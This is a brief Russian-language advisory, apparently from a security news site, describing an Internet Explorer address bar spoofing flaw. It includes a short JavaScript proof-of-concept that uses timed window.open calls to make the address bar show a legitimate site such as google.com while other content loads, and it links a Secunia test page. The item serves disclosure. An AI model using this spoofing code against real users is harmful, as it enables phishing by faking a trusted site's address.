Программа: Internet Explorer

Нападающий может подменить адрес своего сайта открыв предварительно
ориганльный.

Пример:

<a href="javascript:StartTest();">Test Now — Left Click On This Link</a>
<script language="JavaScript">
function openWin(url)
{
window.open(url, ‘window’);
}
function StartTest()
{
openWin(‘http://www.google.com/’);
setTimeout("openWin(‘/19521_swf/?" + Math.random() + "’);", 300);
setTimeout("openWin(‘/19521_swf_result/’);", 2500);
}
</script>


http://secunia.com/Internet_Explorer_Address_Bar_Spoofing_Vulnerability_Test/

 



Оставить мнение